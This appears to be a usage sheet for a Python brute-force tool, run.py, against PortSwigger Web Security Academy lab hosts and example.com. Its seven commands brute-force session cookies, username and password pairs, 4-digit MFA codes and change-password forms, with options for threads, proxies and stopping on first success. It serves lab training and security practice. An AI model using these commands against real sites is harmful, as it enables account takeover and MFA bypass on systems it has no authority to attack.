# Command 1 (one-liner): Cookie brute-force via GET with proxy
python3 run.py "https://0ac30006039032f0801bd59900d50039.web-security-academy.net/my-account?id=carlos" \
	--cookie stay-logged-in=np.txt \
	--expect-text "My Account" \
	--proxy-url http://127.0.0.1:8080 --insecure \
	--threads 20 --method GET

# Command 2 (one-liner): Zip username/password pairs
python3 run.py https://example.com/login \
	--param username=nu.txt --param password=np.txt \
	--zip-fields username password \
	--text "You have made too many incorrect login attempts." \
	--insecure -v --threads 1

# Command 3 (one-liner): Generated passwords with constant username
python3 run.py https://example.com/login \
	--param password=generate:1234asbd:4 --param username="admin" \
	--expect-text "Welcome" --insecure --threads 5

# Command 4 (one-liner): MFA code generation with cookie
python3 run.py https://0a60002103b5517880cab2a3008a0057.web-security-academy.net/login2 \
	--param mfa-code=generate:0123456789:4 \
	--cookie verify="carlos" \
	--text "Incorrect security code" \
	--insecure -v --threads 20 --delay 0.2 --retries 3

# Command 5 (one-liner): MFA with re-authentication
python3 run.py https://0a60002103b5517880cab2a3008a0057.web-security-academy.net/login2 \
	--param mfa-code=generate:0123456789:4 \
	--cookie verify="carlos" \
	--text "Incorrect security code" \
	--insecure -v --threads 1 \
	--login-url https://0a60002103b5517880cab2a3008a0057.web-security-academy.net/login \
	--username carlos --password montoya --reauth 2

# Command 6 (one-liner): Change password form (JSON body)
python3 run.py https://0acd00f903077d2c84635a35004700a9.web-security-academy.net/my-account/change-password \
	--param username="carlos" \
	--param current-password=pass.txt \
	--param new-password-1="tt" \
	--param new-password-2="tt1" \
	--json-body \
	--insecure --proxy-url http://127.0.0.1:8080 --threads 15 -v \
	--expect-text "New passwords do not match" \
	--cookie session=pcBe3rqFVmMfxt459DgF5LU3sNHDqjWr

# Command 7 (one-liner): Stop on first success and write to file
python3 run.py https://example.com/login \
	--param username=nu.txt --param password=np.txt \
	--json-body --code 200 \
	--stop-on-success --output hits.jsonl
